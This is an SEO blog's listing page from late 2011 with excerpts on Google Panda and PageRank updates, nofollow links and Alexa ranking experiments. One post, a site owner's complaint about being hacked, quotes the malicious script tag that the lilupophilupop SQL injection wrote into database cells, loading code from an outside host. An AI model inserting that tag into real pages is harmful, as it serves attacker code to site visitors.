What is 2012 gonna bring us on the seo scene

29. december 2011 Skrevet af Jimmy Sigenstrøm

Well 2011 is almost gone, but it was a year where Google made some big changes on the seo scene. That really had a large impact om many good sites, something that I don’t think was the purpose with the updates.

So what did 2011 bring us.?
In the start of the year we saw the first panda update, where a lot of link directories and article databases got hammered and got sandboxed.
Google did this for several reasons, where I believe that the main reason was to remove some of all the double content there were on many of these sites. But unfortunately some the good sites was affected by this update, they are back again due to their value and of course the fact that they didn’t have any double content. (mere…)

Why do ppl think it’s funny to hack others websites.? (lilupophilupop)

14. december 2011 Skrevet af Jimmy Sigenstrøm

Many of you have properly tried it, not hacking but getting your websites hacked. And about this hacking there are somethings I really don’t understand.

What is it they get out of it, seriously what is it about hacking that is so funny I really can’t figure it out.! :(
The only thing I can say is that it pisses me off when one of my sites get hacked, and they of course sometimes do and they did last week. Where a new hack found a hole in the MSSQL servers, and it updated every single cell with this crap.

"script type="text/javascript" src="http://lilupophilupop.com/sl.php">

What You Need to Know About DoFollow and NoFollow Links

6. december 2011 Skrevet af Nick Sotos

What You Need to Know About DoFollow and NoFollow Links

(And the Difference!)

Without a doubt, vying for traffic on the internet is certainly highly competitive in today’s online marketplace. Most of us understand the basics of link building to increase traffic: More relevant links increase page rankings for our Web sites. In turn this higher visibility drives in even more traffic. But are you familiar with DoFollow and NoFollow links, or their difference?

If not, you may be missing out on a simple and handy tool to get your sites noticed. Or you may be using them incorrectly, which isn’t going to help you either. For those reasons, let’s explore the nuts and bolts of these critical connections, so you can use them to increase your traffic and therefore, get more Page Rank!


Bloggin Contest at Famousbloggers

2. december 2011 Skrevet af Jimmy Sigenstrøm

Hi All

I need you help.!
I’ve entered the blogging contest at Famous Bloggers, and I would love if you would share it on Twitter, Facebook and so on and of course comment on it.! ;)

You can find it here: Ranking, Shares, Likes and Trust has a Large Impact on Sales and Revenue

This Blog Contestis organized by:

Contest Soponsors:

Brick Marketing: Full Service SEO Solutions Company

Best Life Insurance

Web Hosting Deals

Main sponsors $500

Brick Marketing: Full Service SEO Solutions Company

Best Life Insurance

Web Hosting Deals

Ideal Sponsor $300

Promote → daily dealson your website with the Deal Zippy API

Basic Sponsors $150

How to Transform an SEO Trainee into an SEO Expert – A Basic Guide

27. november 2011 Skrevet af Arba

Working in a web development company, I have often found it hard to come across expert SEOs needed for the job. Either I’ve had to outsource projects to freelancers or to pay some experts an exorbitant amount for their expertise. Problem is, most of the time, you don’t really need an, “expert”, all you are looking for is someone who can do basic link building, social media or technical analysis, in short, do some pretty basic stuff at a fair paycheck.

This is where companies take in some raw recruits, who don’t know a thing about Search Engine Optimization, hoping that they will be able to train these greenhorns into some sort of an expert, which is easier said than done. If you have just recently employed an SEO trainee in your company, here is a basic guide on how to put him on track to become an SEO expert. (mere…)

Google did it again, new pagerank update in november

17. november 2011 Skrevet af Jimmy Sigenstrøm

The title says it all, Google have made yet another update the the Pagerank. It’s the fifth update they have made this year so far, which means that a lot of pages has got theres pagerank change.

And of course there is a great focus on it from many webmasters, they want to see if theres has gone up or done. But not many ppl knows have many time the Google pagerank has been updated since it started in 2000, so if you want to see the history on it you might wanna check out this page “Pagerank update history(mere…)

5 Tips to Increase Blog Traffic

4. november 2011 Skrevet af holly727

Most serious bloggers care deeply about increasing traffic to their site, whether their main concern is reaching a wider audience or increasing revenue in order to move toward blogging full time. There are many easy methods you can use to increase traffic to a blog in the short term, but producing a steady, sustainable increase in traffic requires hard work and dedication to doing it right. Here are five of the most successful tips for attracting new visitors to your blog. (mere…)

How did I change my Alexa Ranking

31. oktober 2011 Skrevet af Jimmy Sigenstrøm

This experiment started due to my post on how inaccurate Alexa Ranking is, I wanted to see how easy it is to change ones Alexa Ranking within their guidelines.
It’s one thing to change ones ranking with small tips, but to see a really big increase in ranking I also toke one small step in order to get more traffic.

So what did I do to change my Alexa Ranking with over 100,000 places in 14 days…..

Changing my Alexa Ranking

21. oktober 2011 Skrevet af Jimmy Sigenstrøm

I have in this post written about the inaccuracy in the way Alexa calculates a websites ranking on their site, as a continuation to that post I have been running a little experiment to just see how easy it is to change ones ranking.

As it’s so far much easier than I would ever had believed possible, but due to the fact that it has only have been running for 10 days.
I wont just yet write about what I did, but I can give you the result so far. ;)

Ten days ago my Alexa Ranking was 409,935, today ten days later it’s 334,531.!
In other words my ranking has increased with 75,404 positions on my Alexa Ranking in only ten days. (mere…)

Alexa ranking value is it good for anything

8. oktober 2011 Skrevet af Jimmy Sigenstrøm

Last week I got an article on Pagerank, backlinks, indexed pages and Alexa ranking, published on Famousbloggers.net.(Great site btw, it has a lot of good writers so go check it out.) ;)
I wrote it for the obvious reasons to help other webmasters, to understand the meaning and value of the different things.

But the part about Alexa ranking, was also to try to find out the common believe about what Alexa is and isn’t. And I have to say that I would have said you where nut I you told me last week that there are so many webmasters and advertisers, that don’t even know what their stats on Alexa is based on.

So let us for ones set the record straight about what Alexa ranking is and isn’t, so you as webmaster and/or advertiser knows what it’s all about. (mere…)